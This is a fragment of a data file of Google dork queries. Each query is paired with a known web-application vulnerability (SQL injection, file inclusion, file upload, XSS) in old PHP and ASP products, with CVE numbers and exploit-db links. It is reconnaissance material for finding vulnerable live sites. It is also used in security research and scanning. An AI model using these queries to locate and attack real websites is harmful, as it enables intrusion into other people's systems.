"PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6858"}, {"dork": "\"Powered by Simple PHP Text newsletter\"", "description": "Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities - CVE: 2009-0340: https://www.exploit-db.com/exploits/7813"}, {"dork": "allinurl: \"com_estateagent\"", "description": "Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability - CVE: 2008-0517: https://www.exploit-db.com/exploits/5016"}, {"dork": "powered by Php Blue Dragon Platinum", "description": "Php Blue Dragon CMS 2.9 Remote File Include Vulnerability - CVE: 2006-2392: https://www.exploit-db.com/exploits/1779"}, {"dork": "\"Powered by DZcms\"", "description": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7722"}, {"dork": "inurl:\"com_event\"", "description": "Joomla Component com_event Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12633"}, {"dork": "inurl:\"/alternate_profiles/\"", "description": "e107 Plugin alternate_profiles (id) SQL Injection Vulnerability - CVE: 2008-4785: https://www.exploit-db.com/exploits/6849"}, {"dork": "\"This website is powered by Mobius\"", "description": "Mobius 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3420: https://www.exploit-db.com/exploits/6138"}, {"dork": "intitle:WEBEYES GUEST BOOK inurl:.asp?id=", "description": "WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability - CVE: 2009-1950: https://www.exploit-db.com/exploits/8859"}, {"dork": "\"visiteurs v2.0\"", "description": "Les Visiteurs (Visitors) 2.0 (config.inc.php) File Include Vulnerability: https://www.exploit-db.com/exploits/2449"}, {"dork": "inurl:\"com_portfol\"", "description": "Joomla Component com_portfol SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10844"}, {"dork": "\"Powered by ZeeMatri\"", "description": "ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability - CVE: 2008-5782: https://www.exploit-db.com/exploits/7072"}, {"dork": "inurl:tr.php?id= Banner", "description": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-3749: https://www.exploit-db.com/exploits/6276"}, {"dork": "Powered By: 4images 1.7.1", "description": "4images 1.7.1 Remote SQL Injection Vulnerability - CVE: 2006-5236: https://www.exploit-db.com/exploits/10572"}, {"dork": "intext:\"Powered by Max.Blog\"", "description": "Max.Blog 1.0.6 (submit_post.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7898"}, {"dork": "intitle:USP FOSS Distribution", "description": "USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability - CVE: 2007-2271: https://www.exploit-db.com/exploits/3794"}, {"dork": "inurl:\"vbplaza.php?do=\"", "description": "vBulletin vbBux/vbPlaza 2.x (vbplaza.php) Blind SQL Injection Vuln: https://www.exploit-db.com/exploits/8784"}, {"dork": "allintext:\"Powered by: TotalCalendar\"", "description": "TotalCalendar 2.402 (view_event.php) Remote SQL Injection Vulns - CVE: 2007-3515: https://www.exploit-db.com/exploits/4130"}, {"dork": "Powered by PHP Dir Submit - Directory Submission Script", "description": "PHP Dir Submit (aid) Remote SQL Injection Vulnerability - CVE: 2009-3970: https://www.exploit-db.com/exploits/9484"}, {"dork": "intitle:\"MAXSITE\"", "description": "CMS MAXSITE 1.10 (category) Remote SQL Injection Vulnerability - CVE: 2008-2487: https://www.exploit-db.com/exploits/5676"}, {"dork": "Power with ecsportal rel 6.5", "description": "ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8848"}, {"dork": "inurl:\"list.php?c=\"", "description": "Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability - CVE: 2008-1785: https://www.exploit-db.com/exploits/5384"}, {"dork": "Powered by YaBBSM V2.5.0 Based on YABB SE", "description": "YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability - CVE: 2006-5413: https://www.exploit-db.com/exploits/2553"}, {"dork": "\"Powered by YDC\"", "description": "YDC (kdlist.php cat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6811"}, {"dork": "Powered by emuCMS", "description": "emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability - CVE: 2008-2891: https://www.exploit-db.com/exploits/5878"}, {"dork": "intitle:\"Rx08.ii36B.Rv\"", "description": "RapidLeech Scripts Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/14430"}, {"dork": "intext:\"Design by BB Media.Org\"", "description": "BBMedia Design's (news_more.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12718"}, {"dork": "calendar.asp?eventdetail", "description": "AspWebCalendar 2008 Remote File Upload Vulnerability - CVE: 2008-2832: https://www.exploit-db.com/exploits/5850"}, {"dork": "Powered by Multi Website 1.5", "description": "Multi Website 1.5 (index php action) SQL Injection Vulnerability - CVE: 2009-3150: https://www.exploit-db.com/exploits/9344"}, {"dork": "Powered by iScripts VisualCaster", "description": "SQli Vulnerability in iScripts VisualCaster - CVE: 2010-2853: https://www.exploit-db.com/exploits/12451"}, {"dork": "\"Powered by DesClub.com - phpLinkat\"", "description": "phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability - CVE: 2008-3407: https://www.exploit-db.com/exploits/6140"}, {"dork": "Powered by: Zanfi Solutions", "description": "Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability - CVE: 2008-4159: https://www.exploit-db.com/exploits/6423"}, {"dork": "inurl:\"com_equipment\"", "description": "Joomla Component (com_equipment) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14655"}, {"dork": "\"Everyone should be on TV! Now you can upload 2 TV\"", "description": "Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability - CVE: 2008-3419: https://www.exploit-db.com/exploits/6147"}, {"dork": "\" created by creato.biz \"", "description": "Creato Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12807"}, {"dork": "\"Powered by: Southburn\"", "description": "southburn Web (products.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11430"}, {"dork": "infusions/raidtracker_panel/thisraidprogress.php?", "description": "PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection - CVE: 2008-4521: https://www.exploit-db.com/exploits/6682"}, {"dork": "inurl:\"phpsecurepages\"", "description": "phpSecurePages 0.28b (secure.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2452"}, {"dork": "allinurl: \"index.php?mod=galerie\"action=gal", "description": "KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability - CVE: 2008-6197: https://www.exploit-db.com/exploits/5350"}, {"dork": "Site cr\u00e9\u00e9 avec GuppY v4.5.18 \u00a9", "description": "GuppY v4.5.18 Blind SQL/XPath injection Vulnerability - CVE: 2010-1740: https://www.exploit-db.com/exploits/12484"}, {"dork": "intext:\"Powered by WSN Links Basic Edition\"", "description": "WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility - CVE: 2007-3981: https://www.exploit-db.com/exploits/4209"}, {"dork": "inurl:\"/index.php?option=com_rsfiles\"", "description": "Joomla Component RSfiles 1.0.2 (path) File Download Vulnerability - CVE: 2007-4504: https://www.exploit-db.com/exploits/4307"}, {"dork": "Powered By AstroSPACES", "description": "AstroSPACES (id) Remote SQL Injection Vulnerability - CVE: 2008-4642: https://www.exploit-db.com/exploits/6758"}, {"dork": "Powered by FluentCMS", "description": "FluentCMS (view.php sid) Remote SQL Injection Vulnerability - CVE: 2008-6642: https://www.exploit-db.com/exploits/5509"}, {"dork": "inurl:dpage.php?docID", "description": "The Real Estate Script (dpage.php docID) SQL Injection Vulnerability - CVE: 2008-2443: https://www.exploit-db.com/exploits/5610"}, {"dork": "inurl:\"index.php?option=com_iproperty\"", "description": "Joomla Component (com_iproperty) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14450"}, {"dork": "\"Powered by WebStudio eCatalogue\"", "description": "WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5294: https://www.exploit-db.com/exploits/7223"}, {"dork": "powered by JAF CMS \u00a9 2004 - 2006", "description": "JAF CMS 4.0 RC1 Multiple Remote File Include Vulnerabilities - CVE: 2006-7127: https://www.exploit-db.com/exploits/2474"}, {"dork": "\"Powered by NovaBoard v1.1.2\"", "description": "NovaBoard v1.1.2 SQL Injection Vulnerability - CVE: 2010-0608: https://www.exploit-db.com/exploits/11278"}, {"dork": "inurl:/downlot.php?file=", "description": "Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability - CVE: 2010-2018: https://www.exploit-db.com/exploits/12651"}, {"dork": "inurl:\"read.asp?fID=\"", "description": "JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability - CVE: 2008-2691: https://www.exploit-db.com/exploits/5753"}, {"dork": "\"Powered By The Black Lily 2007\"", "description": "Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/4444"}, {"dork": "inurl:\"simpleblog3\"", "description": "SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7232"}, {"dork": "allinurl:/m2f_usercp.php?", "description": "mail2forum phpBB Mod 1.2 (m2f_root_path) Remote Include Vulns - CVE: 2006-3735: https://www.exploit-db.com/exploits/2019"}, {"dork": "powered by Dreampics Builder", "description": "Dreampics Builder (page) Remote SQL Injection Vulnerability - CVE: 2008-3119: https://www.exploit-db.com/exploits/6034"}, {"dork": "inurl:\"classifide_ad.php\"", "description": "AJ Auction 6.2.1 (classifide_ad.php) SQL Injection Vulnerability - CVE: 2008-5212: https://www.exploit-db.com/exploits/5591"}, {"dork": "inurl:/jobsearchengine/", "description": "I-Net MLM Script Engine SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14080"}, {"dork": "allinurl:\"com_n-gallery\"", "description": "Mambo Component n-gallery Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/5980"}, {"dork": "inurl:com_pinboard", "description": "Joomla Component com_pinboard Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/9011"}, {"dork": "\"\u00c2\u00a9 2005-2006 Powered by eSyndiCat Link Exchange Script\"", "description": "eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability - CVE: 2007-6543: https://www.exploit-db.com/exploits/4791"}, {"dork": "cat_sell.php?cid= or selloffers.php?cid=", "description": "B2B Trading Marketplace SQL Injection Vulnerability - CVE: 2005-3937: https://www.exploit-db.com/exploits/10656"}, {"dork": "\"Powered By Azadi Network\"", "description": "Azadi Network (page) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10830"}, {"dork": "\"Powered by i-pos Storefront\"", "description": "I-Pos Internet Pay Online Store 1.3 Beta SQL Injection Vulnerability - CVE: 2008-2634: https://www.exploit-db.com/exploits/5717"}, {"dork": "intitle:\"ASP inline corporate calendar\" inurl:.asp?id=", "description": "ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2009-2243: https://www.exploit-db.com/exploits/8756"}, {"dork": "inurl:friend.php?op=FriendSend", "description": "PHP-Nuke 'friend.php' Module Remote SQL Injection: https://www.exploit-db.com/exploits/12525"}, {"dork": "inurl:com_gamesbox", "description": "Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability - CVE: 2010-2690: https://www.exploit-db.com/exploits/14126"}, {"dork": "\"Powered by INVOhost\"", "description": "INVOhost SQL Injection - CVE: 2010-1336: https://www.exploit-db.com/exploits/11874"}, {"dork": "\"Powered by WebStudio eHotel\"", "description": "WebStudio eHotel (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5293: https://www.exploit-db.com/exploits/7222"}, {"dork": "inurl:com_redshop", "description": "Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability - CVE: 2010-2694: https://www.exploit-db.com/exploits/14312"}, {"dork": "\"Powered by yacs\"", "description": "YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/8066"}, {"dork": "\"(C) by CyberTeddy\"", "description": "WebLog (index.php file) Remote File Disclosure Vulnerability - CVE: 2007-1487: https://www.exploit-db.com/exploits/3484"}, {"dork": "\"Powered by Shout!\"", "description": "ShoutCMS (content.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11305"}, {"dork": "\"2007 BookmarkX script\"", "description": "BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability - CVE: 2008-0695: https://www.exploit-db.com/exploits/5040"}, {"dork": "Doop CMS", "description": "doop CMS 1.3.7 (page) Local File Inclusion Vulnerability - CVE: 2007-5465: https://www.exploit-db.com/exploits/4536"}, {"dork": "\"powered by sazcart\"", "description": "SazCart 1.5 (cart.php) Remote File Include Vulnerability - CVE: 2006-5727: https://www.exploit-db.com/exploits/2718"}, {"dork": "inurl:com_community", "description": "Joomla Template BizWeb com_community Persistent XSS Vulnerability: https://www.exploit-db.com/exploits/13955"}, {"dork": "allinurl:\"/questcms/\"", "description": "Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities - CVE: 2008-4773: https://www.exploit-db.com/exploits/6853"}, {"dork": "inurl:news.php?mode=voir", "description": "TR News 2.1 (nb) Remote SQL Injection Vulnerability - CVE: 2008-1957: https://www.exploit-db.com/exploits/5483"}, {"dork": "\" Powered by Pie Cart Pro \"", "description": "Pie Cart Pro (Home_Path) Remote File Include Vulnerability - CVE: 2006-4970: https://www.exploit-db.com/exploits/2392"}, {"dork": "inurl:index.php?ini[langpack]=", "description": "Weatimages 1.7.1 ini[langpack] Remote File Inclusion Vulnerability - CVE: 2007-1999: https://www.exploit-db.com/exploits/3700"}, {"dork": "allinurl:\"channel_detail.php?chid=\"", "description": "YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability - CVE: 2007-3518: https://www.exploit-db.com/exploits/4136"}, {"dork": "inurl:apages.php", "description": "Arab Network Tech. (ANT) CMS SQL Injection: https://www.exploit-db.com/exploits/11339"}, {"dork": "\"Designed & Developed by net-finity\"", "description": "net-finity (links.php) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/4629"}, {"dork": "intext:Powered by CPA Site Solutions", "description": "CPA Site Solutions Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11365"}, {"dork": "ClearBudget v0.6.1", "description": "ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities: https://www.exploit-db.com/exploits/7992"}, {"dork": "inurl:func=selectcat + com_remository", "description": "Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability - CVE: 2007-4505: https://www.exploit-db.com/exploits/4306"}, {"dork": "\"ShopMaker v1.0\"", "description": "ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6799"}, {"dork": "\"Powered by jSite 1.0 OE\"", "description": "jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities - CVE: 2008-3192: https://www.exploit-db.com/exploits/6057"}, {"dork": "Powered by Online Email Manager", "description": "Online Email Manager Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/8476"}, {"dork": "\"Web Site Design by Red Cat Studios\"", "description": "Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12776"}, {"dork": "inurl:\"webboard/view.php?topic=\"", "description": "Webboard v.2.90 beta Remote File Disclosure Vulnerability - CVE: 2009-2600: https://www.exploit-db.com/exploits/8823"}, {"dork": "/index.php?option=com_restaurante", "description": "Joomla Component Restaurante Remote File Upload Vulnerability - CVE: 2007-4817: https://www.exploit-db.com/exploits/4383"}, {"dork": "inurl:\"com_portfol\"", "description": "Joomla Component Portfol (vcatid) SQL Injection Vulnerability - CVE: 2009-0494: https://www.exploit-db.com/exploits/7734"}, {"dork": "intitle:\"DUcalendar 1.0\"", "description": "DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability - CVE: 2008-2868: https://www.exploit-db.com/exploits/5927"}, {"dork": "inurl:/infusions/e_cart", "description": "PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability - CVE: 2009-0832: https://www.exploit-db.com/exploits/7698"}, {"dork": "allinurl:flashblog.html \"flashblog\"", "description": "FlashBlog (articulo_id) Remote SQL Injection Vulnerability - CVE: 2008-2572: https://www.exploit-db.com/exploits/5685"}, {"dork": "com_easybook", "description": "Joomla Component EasyBook 1.1 (gbid) SQL Injection - CVE: 2008-2569: https://www.exploit-db.com/exploits/5740"}, {"dork": "inurl:index.php?option=com_nicetalk", "description": "Joomla Component Nice Talk 0.9.3 (tagid) SQL Injection Vulnerability - CVE: 2007-4503: https://www.exploit-db.com/exploits/4308"}, {"dork": "Powered by CMScout (c)2005 CMScout Group", "description": "CMScout (XSS/HTML Injection) Multiple Vulnerabilities - CVE: 2010-2154: https://www.exploit-db.com/exploits/12806"}, {"dork": "powered by minimal Gallery 0.8", "description": "minimal Gallery 0.8 Remote File Disclosure Vulnerability - CVE: 2008-0259: https://www.exploit-db.com/exploits/4902"}, {"dork": "powered by sX-Shop", "description": "sX-Shop (view_image.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14557"}, {"dork": "inurl:\"com_ignitegallery\"", "description": "Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability - CVE: 2008-6182: https://www.exploit-db.com/exploits/6723"}, {"dork": "inurl:com_brightweblinks", "description": "Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability - CVE: 2008-3083: https://www.exploit-db.com/exploits/5993"}, {"dork": "Powered by odlican.net cms v.1.5", "description": "odlican.net cms v.1.5 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11340"}, {"dork": "Powered By form2list", "description": "form2list (page.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8348"}, {"dork": "inurl:/_blogadata/", "description": "Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability - CVE: 2008-1763: https://www.exploit-db.com/exploits/5368"}, {"dork": "SPBOARD v4.5", "description": "Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability - CVE: 2008-4873: https://www.exploit-db.com/exploits/6864"}, {"dork": "inurl:com_jmarket", "description": "joomla com_jmarket SQLi Vulnerability: https://www.exploit-db.com/exploits/13799"}, {"dork": "inurl:com_jtickets", "description": "joomla com_jtickets SQLi Vulnerability: https://www.exploit-db.com/exploits/13797"}, {"dork": "inurl:\"com_rwcards\"", "description": "Joomla Component com_rwcards - Local File Inclusion: https://www.exploit-db.com/exploits/11772"}, {"dork": "\"index.php?sbjoke_id=\"", "description": "Jokes & Funny Pics Script (sb_jokeid) SQL Injection Vulnerability - CVE: 2008-2874: https://www.exploit-db.com/exploits/5934"}, {"dork": "\"This website was created with phpWebThings\"", "description": "phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability - CVE: 2006-6042: https://www.exploit-db.com/exploits/2811"}, {"dork": "inurl:questions.php?idcat", "description": "EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability - CVE: 2008-3952: https://www.exploit-db.com/exploits/6383"}, {"dork": "photokorn 1.52", "description": "PhotoKorn Gallery 1.52 (dir_path) Remote File Include Vulnerabilities - CVE: 2006-4670: https://www.exploit-db.com/exploits/2327"}, {"dork": "Powered by SAPID CMF Build 87", "description": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/5097"}, {"dork": "inurl:\"directory.php?cat=\" pubs", "description": "Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility - CVE: 2007-4258: https://www.exploit-db.com/exploits/4265"}, {"dork": "inurl:\"userjournals.php?blog.\"", "description": "e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8417"}, {"dork": "inurl:\"com_youtube\"", "description": "Joomla Component (com_youtube) SQL Injection Vulnerability - CVE: 2010-2923: https://www.exploit-db.com/exploits/14467"}, {"dork": "inurl:\"index.php?serverid=\"", "description": "Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability - CVE: 2008-6260: https://www.exploit-db.com/exploits/7148"}, {"dork": "inurl:\"com_photoblog\"", "description": "Joomla (com_photoblog) Blind Sql Injection Vulnerability - CVE: 2010-0610: https://www.exploit-db.com/exploits/11337"}, {"dork": "inurl:indexmess.php", "description": "Messagerie Locale (centre.php) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/2832"}, {"dork": "Powered by phpFaber URLInn. Copyright \u00c2\u00a9 2004-2006 phpFaber", "description": "phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability - CVE: 2007-5754: https://www.exploit-db.com/exploits/4588"}, {"dork": "inurl:com_joomradio", "description": "Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability - CVE: 2008-2633: https://www.exploit-db.com/exploits/5729"}, {"dork": "inurl:com_jnewsletter", "description": "joomla com_jnewsletter SQLi Vulnerability: https://www.exploit-db.com/exploits/13804"}, {"dork": "inurl:inc_classifiedlistingsmanager.asp", "description": "DMXReady Classified Listings Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0426: https://www.exploit-db.com/exploits/7767"}, {"dork": "Powered by Online Guestbook Pro", "description": "Online Guestbook Pro (display) Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8475"}, {"dork": "inurl:\"track.php?id=\"", "description": "phpstore Wholesale (track.php?id) SQL Injection Vulnerability - CVE: 2008-5493: https://www.exploit-db.com/exploits/7134"}, {"dork": "inurl:com_jcommunity", "description": "joomla com_jcommunity SQLi Vulnerability: https://www.exploit-db.com/exploits/13798"}, {"dork": "/modules/tadbook2/open_book.php?book_sn=", "description": "XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln: https://www.exploit-db.com/exploits/7725"}, {"dork": "''links.asp?CatId''", "description": "ASPapp (links.asp CatId) Remote SQL Injection Vulnerability - CVE: 2008-1430: https://www.exploit-db.com/exploits/5276"}, {"dork": "inurl:\"search_form.php?sb_showresult=\"", "description": "Getacoder clone (sb_protype) Remote SQL Injection Vulnerability - CVE: 2008-3372: https://www.exploit-db.com/exploits/6143"}, {"dork": "Powered by boastMachine v3.1", "description": "boastMachine 3.1 (mail.php id) SQL Injection Vulnerability - CVE: 2008-0422: https://www.exploit-db.com/exploits/4952"}, {"dork": "\"index.php?section=post_upload\"", "description": "DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability: https://www.exploit-db.com/exploits/7629"}, {"dork": "Copyright 2007, PHPAUCTION.NET", "description": "phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability - CVE: 2008-2900: https://www.exploit-db.com/exploits/5892"}, {"dork": "Online Booking Manager2.2", "description": "Online Booking Manager 2.2 (id) SQL Injection Vulnerability - CVE: 2008-5194: https://www.exploit-db.com/exploits/5964"}, {"dork": "\"cms SunLight 5.2\"", "description": "SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities - CVE: 2007-2774: https://www.exploit-db.com/exploits/3953"}, {"dork": "option=com_paxxgallery", "description": "Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection: https://www.exploit-db.com/exploits/5514"}, {"dork": "inurl:index.php?option=com_NeoRecruit", "description": "Joomla Component NeoRecruit 1.4 (id) SQL Injection Vulnerability - CVE: 2007-4506: https://www.exploit-db.com/exploits/4305"}, {"dork": "\"Powered by Battle Blog\"", "description": "Battle Blog 1.25 (comment.asp) Remote SQL Injection Vulnerability - CVE: 2008-2626: https://www.exploit-db.com/exploits/5731"}, {"dork": "inurl:\"vcalendar_asp\"", "description": "VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7180"}, {"dork": "inurl:\"com_simpledownload\"", "description": "Joomla Component simpledownload Local File Disclosure - CVE: 2010-2122: https://www.exploit-db.com/exploits/12623"}, {"dork": "allinurl :\"/modules/tutorials/\"", "description": "XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability - CVE: 2008-1351: https://www.exploit-db.com/exploits/5245"}, {"dork": "powered by joovili", "description": "Joovili 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability - CVE: 2007-6621: https://www.exploit-db.com/exploits/4799"}, {"dork": "intext:Powered by SaphpLesson 4.0", "description": "SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2883: https://www.exploit-db.com/exploits/9248"}, {"dork": "infusions/triscoop_race_system/race_details.php?", "description": "PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln: https://www.exploit-db.com/exploits/6684"}, {"dork": "intext:\"Event List 0.8 Alpha by schlu.net \"", "description": "Joomla Component EventList 0.8 (did) SQL Injection Vulnerability - CVE: 2007-4509: https://www.exploit-db.com/exploits/4309"}, {"dork": "developed by ARWScripts.com", "description": "Free Photo Gallery Site Script (path) File Disclosure Vulnerability - CVE: 2008-1730: https://www.exploit-db.com/exploits/5419"}, {"dork": "\"powered by CMS Made Simple version 1.1.2\"", "description": "CMS Made Simple 1.2 Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/4442"}, {"dork": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "description": "Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability - CVE: 2008-1783: https://www.exploit-db.com/exploits/5387"}, {"dork": "\"Webdesign Cosmos Solutions\"", "description": "Cosmos Solutions cms SQL Injection Vulnerability ( id= / page= ): https://www.exploit-db.com/exploits/12794"}, {"dork": "inurl:cal_cat.php?op=", "description": "Calendarix (cal_cat.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14393"}, {"dork": "inurl:com_liveticker", "description": "Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln - CVE: 2008-6148: https://www.exploit-db.com/exploits/7573"}, {"dork": "intext:\"Powered by the 1-2-3 music store\"", "description": "Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln - CVE: 2007-3520: https://www.exploit-db.com/exploits/4134"}, {"dork": "?action=pro_show and ?action=disppro", "description": "EPShop 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-3412: https://www.exploit-db.com/exploits/6139"}, {"dork": "Powered by WebspotBlogging", "description": "bspotBlogging 3.0.1 (path) Remote File Include Vulnerability - CVE: 2006-2860: https://www.exploit-db.com/exploits/1871"}, {"dork": "\"powered by vsp stats processor\"", "description": "vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln - CVE: 2009-1224: https://www.exploit-db.com/exploits/8331"}, {"dork": "inurl:employer_profile.php?compid=", "description": "ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3706: https://www.exploit-db.com/exploits/6249"}, {"dork": "inurl:com_awd_song", "description": "Joomla JE Awd Song Component Persistent XSS Vulnerability - CVE: 2010-2613: https://www.exploit-db.com/exploits/14059"}, {"dork": "\"MangoBery 1.0 Alpha\"", "description": "MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability - CVE: 2007-1837: https://www.exploit-db.com/exploits/3598"}, {"dork": "inurl:view_group.php?id=", "description": "BookMarks Favourites Script (view_group.php id) SQL Injection Vuln - CVE: 2008-6007: https://www.exploit-db.com/exploits/6637"}, {"dork": "allinurl: \"index.php?p=gallerypic img_id\"", "description": "Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability - CVE: 2008-6210: https://www.exploit-db.com/exploits/5415"}, {"dork": "allinurl:com_jpad", "description": "Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth) - CVE: 2008-4715: https://www.exploit-db.com/exploits/5493"}, {"dork": "allinurl:\"com_candle\"", "description": "Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5221"}, {"dork": "\"powered by FlatPress\"", "description": "FlatPress 0.909.1 Stored XSS Vulnerability: https://www.exploit-db.com/exploits/12034"}, {"dork": "inurl:ugroups.php?UID=", "description": "TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability - CVE: 2008-3674: https://www.exploit-db.com/exploits/6170"}, {"dork": "allinurl:option=com_livechat", "description": "Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities - CVE: 2008-6883: https://www.exploit-db.com/exploits/7441"}, {"dork": "Powered by phpMyDesktop|arcade v1.0 (final)", "description": "PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability: https://www.exploit-db.com/exploits/4755"}, {"dork": "inurl:com_products \"intCategoryId\"", "description": "Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11691"}, {"dork": "inurl:index.php?mod=jeuxflash", "description": "KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability - CVE: 2007-4922: https://www.exploit-db.com/exploits/4400"}, {"dork": "inurl:\"track.php?id=\"", "description": "SFS EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability - CVE: 2008-6245: https://www.exploit-db.com/exploits/6910"}, {"dork": "\"Ladder Scripts by\"", "description": "My Gaming Ladder 7.5 (ladderid) SQL Injection Vulnerability - CVE: 2008-1791: https://www.exploit-db.com/exploits/5401"}, {"dork": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "description": "POWERGAP 2003 (s0x.php) Remote File Include Vulnerability - CVE: 2006-4236: https://www.exploit-db.com/exploits/2201"}, {"dork": "\"PKs Movie Database\"", "description": "PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/5095"}, {"dork": "inurl:enq/big.asp?id=", "description": "(big.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12533"}, {"dork": "allintext:\"Powered By Buddy Zone\"", "description": "Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-3549: 